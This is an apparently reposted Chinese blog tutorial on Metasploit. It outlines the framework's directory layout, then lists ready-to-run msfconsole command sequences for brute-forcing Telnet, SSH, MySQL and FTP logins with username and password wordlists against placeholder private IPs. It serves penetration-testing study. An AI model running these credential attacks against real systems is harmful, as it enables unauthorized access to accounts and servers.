[msfconsole进阶]关于目录和暴力破解

gclome

原文链接：[msfconsole进阶]关于目录和暴力破解

Metasploit 目录结构
目录地址：/usr/share/metasploit-framework/
最重要的目录是 data，modules，scripts，tools，plugins
​
主目录结构 data 目录存放 meterpreter，exploits，wordlists 等。
​

meterpreter 是 msf 的攻击载荷，使用于后渗透阶段

exploits 里面则存放了许多的 cve 漏洞利用代码
wordlists 里面放的是字典文件
modules 目录metasploit 的核心目录了，存放着各个攻击模块。用于完成攻击。
scirpts 目录存放一些 msf 用到的脚本文件，如 meterpreter，ps，resource，shell等常见的脚本。
tools 目录存放各种可使用的工具
plugins 目录存放 msf 的各种插件

Metasploit 爆破篇爆破 TELNET

1. use auxiliary/scanner/telnet/telnet_login
   
2. set RHOSTS 192.168.1.1 #目标ip
   
3. set STOP_ON_SUCCESS true #爆破成功就停止 msf
   
4. set VERBOSE true #打印输出
   
5. set USER_FILE /root/Desktop/username.txt
   
6. set PASS_FILE /root/Desktop/password.txt
   
7. run

复制代码

爆破 SSH

1. use auxiliary/scanner/ssh/ssh_login
   
2. set RHOSTS 192.168.1.1
   
3. set STOP_ON_SUCCESS true #爆破成功就停止 msf
   
4. set VERBOSE true #打印输出
   
5. set USER_FILE /root/Desktop/username.txt
   
6. set PASS_FILE /root/Desktop/password.txt
   
7. set THREADS 50
   
8. run

复制代码

爆破 MySQLps需目标主机开启3306端口和远程登录账号

1. use auxiliary/scanner/mysql/mysql_login
   
2. set RHOSTS 192.168.1.101
   
3. set STOP_ON_SUCCESS true #爆破成功就停止 msf
   
4. set VERBOSE true #打印输出
   
5. set USER_FILE /root/Desktop/username.txt
   
6. set PASS_FILE /root/Desktop/password.txt
   
7. run

复制代码

爆破 FTP

1. use auxiliary/scanner/ftp/ftp_login
   
2. set RHOSTS 192.168.1.1
   
3. set STOP_ON_SUCCESS true #爆破成功就停止
   
4. set VERBOSE true #打印输出
   
5. set USERNAME admin # frp账号
   
6. set PASS_FILE /root/Desktop/password.txt
   
7. run

复制代码